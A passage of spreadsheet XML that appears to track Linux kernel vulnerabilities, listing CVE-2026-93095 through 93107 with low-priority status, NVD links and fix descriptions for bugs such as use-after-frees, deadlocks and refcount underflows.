      <c r="H911" s="5" t="inlineStr"/>
      <c r="I911" s="5" t="inlineStr"/>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr"/>
      <c r="L911" s="5" t="inlineStr"/>
      <c r="M911" s="5" t="inlineStr"/>
      <c r="N911" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O911" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P911" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q911" s="5" t="inlineStr"/>
      <c r="R911" s="5" t="inlineStr"/>
      <c r="S911" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hfsplus: validate thread record before delete key rebuild
hfsplus_delete_cat() is called with str == NULL when the last open
reference to an unlinked HFS+ hardlink backing inode is closed. In that
case, the function finds the catalog thread by CNID and rebuilds the
catalog key from thread.nodeName.
That reconstruction path reads thread.nodeName.length directly from the
catalog B-tree into fd.search_key and then copies length * 2 bytes into
fd.search_key-&gt;cat.name.unicode. It does not first check that the found
record is a thread record or that its size matches the thread name.
A corrupted image can therefore provide an oversized thread name length
and make hfs_bnode_read() write past the catalog search-key allocation.
Read the CNID record through hfsplus_brec_read_cat(), which bounds the
record read to sizeof(hfsplus_cat_entry) and verifies that a thread
record's size exactly matches nodeName.length. Together, these checks
ensure an accepted thread name fits HFSPLUS_MAX_STRLEN. Reject non-thread
records before building the delete key from the validated thread name.
Share the thread-record-type helper between hfsplus_find_cat() and
hfsplus_delete_cat().</t>
        </is>
      </c>
      <c r="T911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93095</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93096</t>
        </is>
      </c>
      <c r="D912" s="5" t="inlineStr"/>
      <c r="E912" s="5" t="inlineStr"/>
      <c r="F912" s="5" t="inlineStr"/>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="inlineStr"/>
      <c r="I912" s="5" t="inlineStr"/>
      <c r="J912" s="5" t="inlineStr"/>
      <c r="K912" s="5" t="inlineStr"/>
      <c r="L912" s="5" t="inlineStr"/>
      <c r="M912" s="5" t="inlineStr"/>
      <c r="N912" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O912" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P912" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q912" s="5" t="inlineStr"/>
      <c r="R912" s="5" t="inlineStr"/>
      <c r="S912" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: Serialize multi-part Get/Set Feature transfers
A Get or Set Feature payload larger than the mailbox payload size is
split into several mailbox commands. mbox_mutex only serializes
individual mailbox commands and is dropped between iterations of these
loops. Nothing serializes the multi-part transfer as a whole.
cxl_get_feature() and cxl_set_feature() are reachable concurrently
from fwctl (per-fd RPCs run under a read-held registration lock) and
from the EDAC scrub/ECS/repair paths, so two transfers to the same
mailbox can interleave their parts and corrupt the device's transfer
context.
Add a per-mailbox feat_mutex and hold it across the whole transfer in
both functions. It nests outside mbox_mutex (which is taken inside
cxl_internal_send_cmd()), and is taken nowhere else, so no lock-ordering
inversion is introduced.</t>
        </is>
      </c>
      <c r="T912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93096</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93097</t>
        </is>
      </c>
      <c r="D913" s="5" t="inlineStr"/>
      <c r="E913" s="5" t="inlineStr"/>
      <c r="F913" s="5" t="inlineStr"/>
      <c r="G913" s="5" t="inlineStr"/>
      <c r="H913" s="5" t="inlineStr"/>
      <c r="I913" s="5" t="inlineStr"/>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr"/>
      <c r="L913" s="5" t="inlineStr"/>
      <c r="M913" s="5" t="inlineStr"/>
      <c r="N913" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O913" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P913" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q913" s="5" t="inlineStr"/>
      <c r="R913" s="5" t="inlineStr"/>
      <c r="S913" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/mbox: Break poison list loop on an empty payload
A device that returns count == 0 with CXL_POISON_FLAG_MORE set on every
iteration never advances nr_records, so the max_errors guard never
trips and the do/while loops forever while holding poison.mutex. That
hangs the sysfs-triggered scan thread and blocks all subsequent poison
operations on the device. The existing "Protect against an uncleared
_FLAG_MORE" guard was intended to bound a misbehaving device but does
not cover the count == 0 case.
Stop the loop on an empty payload so a malfunctioning or malicious
device cannot wedge the poison scan.</t>
        </is>
      </c>
      <c r="T913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93097</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93098</t>
        </is>
      </c>
      <c r="D914" s="5" t="inlineStr"/>
      <c r="E914" s="5" t="inlineStr"/>
      <c r="F914" s="5" t="inlineStr"/>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="inlineStr"/>
      <c r="I914" s="5" t="inlineStr"/>
      <c r="J914" s="5" t="inlineStr"/>
      <c r="K914" s="5" t="inlineStr"/>
      <c r="L914" s="5" t="inlineStr"/>
      <c r="M914" s="5" t="inlineStr"/>
      <c r="N914" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O914" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P914" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q914" s="5" t="inlineStr"/>
      <c r="R914" s="5" t="inlineStr"/>
      <c r="S914" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rpmsg: glink: fix deadlock in endpoint destroy during driver detach
During driver detach, the device core holds the device mutex throughout
the driver's remove callback chain.  When the rpmsg endpoint is
destroyed as part of that teardown, the GLINK endpoint destroy
implementation attempts to unregister the underlying rpmsg device.
That unregistration calls device_del(), which tries to re-acquire the
same device mutex already held higher up the stack, causing rmmod to
hang indefinitely.
The deadlock manifests with the following call chain:
[&lt;0&gt;] device_del+0x44/0x414  &lt;- tries to acquire same mutex
[&lt;0&gt;] device_unregister+0x18/0x34
[&lt;0&gt;] rpmsg_unregister_device+0x28/0x4c
[&lt;0&gt;] qcom_glink_remove_rpmsg_device+0x70/0xc0
[&lt;0&gt;] qcom_glink_destroy_ept+0x58/0xbc
[&lt;0&gt;] rpmsg_dev_remove+0x50/0x60
[&lt;0&gt;] device_remove+0x4c/0x80
[&lt;0&gt;] device_release_driver_internal+0x1cc/0x228  &lt;- acquires device mutex
[&lt;0&gt;] driver_detach+0x4c/0x98
[&lt;0&gt;] bus_remove_driver+0x6c/0xbc
[&lt;0&gt;] driver_unregister+0x30/0x60
[&lt;0&gt;] unregister_rpmsg_driver+0x10/0x1c
[&lt;0&gt;] fastrpc_exit+0x28/0x38 [fastrpc]
[&lt;0&gt;] __arm64_sys_delete_module+0x1b8/0x294
[&lt;0&gt;] invoke_syscall+0x48/0x10c
[&lt;0&gt;] el0_svc_common.constprop.0+0xc0/0xe0
[&lt;0&gt;] do_el0_svc+0x1c/0x28
[&lt;0&gt;] el0_svc+0x34/0x108
[&lt;0&gt;] el0t_64_sync_handler+0xa0/0xe4
[&lt;0&gt;] el0t_64_sync+0x198/0x19c
The rpmsg device unregistration inside endpoint destroy is redundant.
In both contexts where endpoint destruction is triggered:
- Driver detach path: the driver core already tears down the rpmsg
  device.
- Channel close path: the rpmsg device is already unregistered before
  endpoint destruction is reached.
Remove the redundant unregistration to fix the deadlock.</t>
        </is>
      </c>
      <c r="T914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93098</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93099</t>
        </is>
      </c>
      <c r="D915" s="5" t="inlineStr"/>
      <c r="E915" s="5" t="inlineStr"/>
      <c r="F915" s="5" t="inlineStr"/>
      <c r="G915" s="5" t="inlineStr"/>
      <c r="H915" s="5" t="inlineStr"/>
      <c r="I915" s="5" t="inlineStr"/>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr"/>
      <c r="L915" s="5" t="inlineStr"/>
      <c r="M915" s="5" t="inlineStr"/>
      <c r="N915" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O915" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P915" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q915" s="5" t="inlineStr"/>
      <c r="R915" s="5" t="inlineStr"/>
      <c r="S915" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/resctrl: Fix UAF from worker threads when domains are removed
The mbm_handle_overflow() and cqm_handle_limbo() workers read event counters
and may sleep while doing so. They are scheduled via delayed_work embedded in
struct rdt_l3_mon_domain. Architecture allocates and frees these domains from
CPU hotplug callbacks under cpus_write_lock(), and the workers acquire
cpus_read_lock() to keep the domain alive across their access.
A use-after-free can occur when a worker is blocked waiting for
cpus_read_lock() while the hotplug core holds cpus_write_lock(): the
architecture frees the rdt_l3_mon_domain that contains the worker's
work_struct. When the worker unblocks, the container_of() it performs on the
embedded work pointer dereferences freed memory.
Drop cpus_read_lock() from the workers and instead drain pending and in-flight
work synchronously before the architecture can free the domain.  Since
architecture offlines the domain under cpus_write_lock() after it has been
unlinked from the RCU list and a grace period has elapsed, no new work can be
scheduled. The cancel only needs to wait out existing work.  Drop
rdtgroup_mutex during CPU offline around cancel_delayed_work_sync() so that
a worker waiting on the mutex can complete before re-pinning the work on
a different CPU.
When offlining a CPU the architecture may iterate over resources in any order.
For example, the MBA control domain may be offlined before or after
a corresponding L3 monitor domain. Ensure that resctrl fs cancels the workers
no matter what order the architecture offlines the domains.</t>
        </is>
      </c>
      <c r="T915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93099</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93100</t>
        </is>
      </c>
      <c r="D916" s="5" t="inlineStr"/>
      <c r="E916" s="5" t="inlineStr"/>
      <c r="F916" s="5" t="inlineStr"/>
      <c r="G916" s="5" t="inlineStr"/>
      <c r="H916" s="5" t="inlineStr"/>
      <c r="I916" s="5" t="inlineStr"/>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr"/>
      <c r="L916" s="5" t="inlineStr"/>
      <c r="M916" s="5" t="inlineStr"/>
      <c r="N916" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O916" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P916" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q916" s="5" t="inlineStr"/>
      <c r="R916" s="5" t="inlineStr"/>
      <c r="S916" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/resctrl: Prevent use-after-free in rdtgroup_kn_put()
A struct rdtgroup is reference counted via rdtgroup::waitcount. Callers that
need the structure to remain valid across a sleep (while waiting on acquiring
rdtgroup_mutex) take a reference with rdtgroup_kn_get() and release it with
rdtgroup_kn_put().
The release path is intended to serve as the fallback freer: if the count
drops to zero and the group has already been marked RDT_DELETED,
rdtgroup_kn_put() frees the structure.
The bulk teardown paths free_all_child_rdtgrp() and rmdir_all_sub() resulting
from a resctrl directory remove or resctrl fs unmount act as the primary
freer: they hold rdtgroup_mutex and free each rdtgroup whose waitcount is
zero, otherwise they set RDT_DELETED and leave the freeing to the last waiter.
These two freers race. rdtgroup_kn_put() commits waitcount == 0 with
atomic_dec_and_test() outside rdtgroup_mutex, then reads rdtgroup::flags.
Between those two operations a concurrent caller of free_all_child_rdtgrp()
or rmdir_all_sub() (which holds the mutex) can observe waitcount == 0 via
atomic_read(), call rdtgroup_remove(), and kfree() the structure.
The subsequent read of rdtgroup::flags in rdtgroup_kn_put() is then
a use-after-free, and the structure may even be freed twice if the freed
memory happens to satisfy the RDT_DELETED flag check.
Replace the bare atomic_dec_and_test() with atomic_dec_and_mutex_lock() so
that the decrement-to-zero takes rdtgroup_mutex before the count becomes
globally visible. The inspection of rdtgroup::flags then runs under the same
mutex held by the bulk freers, making the two paths mutually exclusive.
The common case where the count does not reach zero remains lock-free. Defer
kernfs_unbreak_active_protection() until after the mutex is dropped since
kernfs active protections functionally wrap rdtgroup_mutex. Remove resource
group, which in turn drops its kernfs reference, after kernfs protection is
restored.
  [ bp: Split the commit messsages into smaller, easier-parseable paragraphs. ]</t>
        </is>
      </c>
      <c r="T916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93100</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93101</t>
        </is>
      </c>
      <c r="D917" s="5" t="inlineStr"/>
      <c r="E917" s="5" t="inlineStr"/>
      <c r="F917" s="5" t="inlineStr"/>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="inlineStr"/>
      <c r="I917" s="5" t="inlineStr"/>
      <c r="J917" s="5" t="inlineStr"/>
      <c r="K917" s="5" t="inlineStr"/>
      <c r="L917" s="5" t="inlineStr"/>
      <c r="M917" s="5" t="inlineStr"/>
      <c r="N917" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O917" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P917" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q917" s="5" t="inlineStr"/>
      <c r="R917" s="5" t="inlineStr"/>
      <c r="S917" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-async: Unregister sub-device if asc_list is empty
When my em28xx USB device that uses the i2c tvp5150 driver is
disconnected, it crashes.
The cause is that the tvp5150 i2c module uses v4l2_async, but
the em28xx driver does not since it predates v4l2_async.
In that corner case sd-&gt;asc_list is empty, so
v4l2_async_unregister_subdev() never calls v4l2_device_unregister_subdev().
Modify the code so that, if sd-&gt;asc_list is empty,
v4l2_device_unregister_subdev() is still called.</t>
        </is>
      </c>
      <c r="T917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93101</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93102</t>
        </is>
      </c>
      <c r="D918" s="5" t="inlineStr"/>
      <c r="E918" s="5" t="inlineStr"/>
      <c r="F918" s="5" t="inlineStr"/>
      <c r="G918" s="5" t="inlineStr"/>
      <c r="H918" s="5" t="inlineStr"/>
      <c r="I918" s="5" t="inlineStr"/>
      <c r="J918" s="5" t="inlineStr"/>
      <c r="K918" s="5" t="inlineStr"/>
      <c r="L918" s="5" t="inlineStr"/>
      <c r="M918" s="5" t="inlineStr"/>
      <c r="N918" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O918" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P918" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q918" s="5" t="inlineStr"/>
      <c r="R918" s="5" t="inlineStr"/>
      <c r="S918" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/hfi1: Free RX data on late probe failure
hfi1_init_dd() allocates the shared AIP/VNIC RX support before returning.
If hfi1_init() or hfi1_register_ib_device() later fails, init_one() tears
down the device data without calling hfi1_free_rx(). This leaks netdev_rx
and its dummy netdev.
Free the RX support after IB unregistration and before postinit_cleanup(),
as done on normal device removal.</t>
        </is>
      </c>
      <c r="T918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93102</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93103</t>
        </is>
      </c>
      <c r="D919" s="5" t="inlineStr"/>
      <c r="E919" s="5" t="inlineStr"/>
      <c r="F919" s="5" t="inlineStr"/>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="inlineStr"/>
      <c r="I919" s="5" t="inlineStr"/>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr"/>
      <c r="L919" s="5" t="inlineStr"/>
      <c r="M919" s="5" t="inlineStr"/>
      <c r="N919" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O919" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P919" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q919" s="5" t="inlineStr"/>
      <c r="R919" s="5" t="inlineStr"/>
      <c r="S919" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/hfi1: Preserve unit 0 on allocation failure
hfi1_free_devdata() assumes that the device was inserted into the unit
table and unconditionally erases dd-&gt;unit. If xa_alloc_irq() fails, the
zero-initialized unit remains zero, so full cleanup can remove an
unrelated device from index 0.
Release only the rdmavt allocation and return immediately while the unit
table has not acquired the device.</t>
        </is>
      </c>
      <c r="T919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93103</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93104</t>
        </is>
      </c>
      <c r="D920" s="5" t="inlineStr"/>
      <c r="E920" s="5" t="inlineStr"/>
      <c r="F920" s="5" t="inlineStr"/>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="inlineStr"/>
      <c r="I920" s="5" t="inlineStr"/>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr"/>
      <c r="L920" s="5" t="inlineStr"/>
      <c r="M920" s="5" t="inlineStr"/>
      <c r="N920" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O920" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P920" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q920" s="5" t="inlineStr"/>
      <c r="R920" s="5" t="inlineStr"/>
      <c r="S920" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/rvt: Return NULL after port allocation failure
rvt_alloc_device() deallocates the IB device when its port array cannot
be allocated but then returns the pointer to the released allocation.
Callers treat any non-NULL value as valid and dereference it, resulting
in a use-after-free.
Return NULL immediately after deallocation so callers can propagate the
allocation failure.</t>
        </is>
      </c>
      <c r="T920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93104</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93105</t>
        </is>
      </c>
      <c r="D921" s="5" t="inlineStr"/>
      <c r="E921" s="5" t="inlineStr"/>
      <c r="F921" s="5" t="inlineStr"/>
      <c r="G921" s="5" t="inlineStr"/>
      <c r="H921" s="5" t="inlineStr"/>
      <c r="I921" s="5" t="inlineStr"/>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr"/>
      <c r="L921" s="5" t="inlineStr"/>
      <c r="M921" s="5" t="inlineStr"/>
      <c r="N921" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O921" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P921" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q921" s="5" t="inlineStr"/>
      <c r="R921" s="5" t="inlineStr"/>
      <c r="S921" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
esp: do not unref managed frag pages in esp_ssg_unref()
esp_ssg_unref() releases the page references held on the source
scatterlist after the AEAD operation completes.  It calls
skb_page_unref() on every frag page for an out-of-place transform
(req-&gt;src != req-&gt;dst), and in the error path of esp_output_tail()
(already_unref == true) on the request's own scatterlist.
This is wrong when the skb carries managed frags
(SKBFL_MANAGED_FRAG_REFS).  Managed frags are owned by a zerocopy ubuf
and the skb does not hold a per-frag page reference; io_uring SEND_ZC
with a registered buffer attaches the bvec pages this way via
io_sg_from_iter().  The rest of the stack honours this invariant:
skb_release_data() skips the per-frag unref when SKBFL_MANAGED_FRAG_REFS
is set, and skb_zcopy_managed() is the guard used at the other unref
sites.
esp_ssg_unref() is missing that guard, so for a managed-frag skb it
drops a page reference the skb never acquired.  This can underflow the
page reference count and free a page that is still in use.
Guard the function with skb_zcopy_managed() so both unref paths are
skipped for managed-frag skbs, matching skb_release_data().</t>
        </is>
      </c>
      <c r="T921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93105</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93106</t>
        </is>
      </c>
      <c r="D922" s="5" t="inlineStr"/>
      <c r="E922" s="5" t="inlineStr"/>
      <c r="F922" s="5" t="inlineStr"/>
      <c r="G922" s="5" t="inlineStr"/>
      <c r="H922" s="5" t="inlineStr"/>
      <c r="I922" s="5" t="inlineStr"/>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr"/>
      <c r="L922" s="5" t="inlineStr"/>
      <c r="M922" s="5" t="inlineStr"/>
      <c r="N922" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O922" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P922" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q922" s="5" t="inlineStr"/>
      <c r="R922" s="5" t="inlineStr"/>
      <c r="S922" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crash_dump: release keyring reference at the correct time
restore_dm_crypt_keys_to_thread_keyring() gets a reference to the user
keyring before restoring the saved dm-crypt keys.
The same keyring reference is then passed to add_key_to_keyring() for each
saved key, but add_key_to_keyring() drops that reference on every call.
This is only balanced when exactly one key is restored. With multiple
keys, the keyring reference is dropped too many times and may trigger a
refcount underflow or use-after-free.
When more than five keys are restored, a refcount underflow/use-after-free
warning can be triggered.
The early error paths after lookup_user_key() also return without dropping
the keyring reference.
Keep ownership of the keyring reference in
restore_dm_crypt_keys_to_thread_keyring(), drop it once on all exit paths,
and make add_key_to_keyring() only use the reference without consuming it.</t>
        </is>
      </c>
      <c r="T922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93106</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93107</t>
        </is>
      </c>
      <c r="D923" s="5" t="inlineStr"/>
      <c r="E923" s="5" t="inlineStr"/>
      <c r="F923" s="5" t="inlineStr"/>
      <c r="G923" s="5" t="inlineStr"/>
      <c r="H923" s="5" t="inlineStr"/>
      <c r="I923" s="5" t="inlineStr"/>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr"/>
      <c r="L923" s="5" t="inlineStr"/>
      <c r="M923" s="5" t="inlineStr"/>
      <c r="N923" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O923" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P923" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q923" s="5" t="inlineStr"/>
      <c r="R923" s="5" t="inlineStr"/>
      <c r="S923" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/rxe: Avoid reprocessing the current packet after the QP enters the error state
When do_complete() finds the QP in the error state it returns
RESPST_CHK_RESOURCE.  Before commit 49dc9c1f0c7e ("RDMA/rxe: Cleanup
reset state handling in rxe_resp.c") this was the flush loop:
check_resource() had an error-state branch that fetched each remaining
recv WQE and completed it with IB_WC_WR_FLUSH_ERR, without touching
the current packet.  That commit removed the error-state branch from
check_resource() (draining is now done at rxe_receiver() entry) but
kept the do_complete() error-state return.
As a result, when a QP moves to the error state while a packet is
being completed - e.g. an rdma_cm disconnect racing with receive
processing - the responder state machine loops back into the request
processing chain with the already-completed packet still in hand:
check_resource() fetches a fresh recv WQE, execute()/send_data_in()
copies the same packet payload again, do_complete() posts another
IB_WC_SUCCESS CQE (qp-&gt;resp.status is still 0), and control returns
to the error-state check.  The loop re-executes the same packet once
per posted recv WQE (observed: ~1000 duplicate IB_WC_SUCCESS
completions of one SEND, one per ~8us, matching the RQ occupancy)
until the RQ is exhausted, after which qp-&gt;resp.wqe is NULL and
send_data_in() dereferences it:
  BUG: kernel NULL pointer dereference, address: 0000000000000014
  Workqueue: rxe_wq do_work
  RIP: copy_data+0x29/0x1f0
  Call Trace:
   send_data_in+0x25/0x50
   rxe_receiver+0xf36/0x1dd0
The duplicate completions are indistinguishable from real receives to
the ULP.  During an rds stress test, the message was accepted as new and
delivered the same datagram to user space hundreds of times, corrupting
the stream; any ULP that relies on RC exactly-once delivery is affected.
A live packet reaching the error-state check in do_complete() has
been executed and completed exactly once and must be consumed, not
re-processed.  Return RESPST_CLEANUP for it (dequeue and free); keep
returning RESPST_CHK_RESOURCE for the pkt == NULL case.</t>
        </is>
      </c>
      <c r="T923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93107</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93108</t>
        </is>
      </c>
      <c r="D924" s="5" t="inlineStr"/>
      <c r="E924" s="5" t="inlineStr"/>
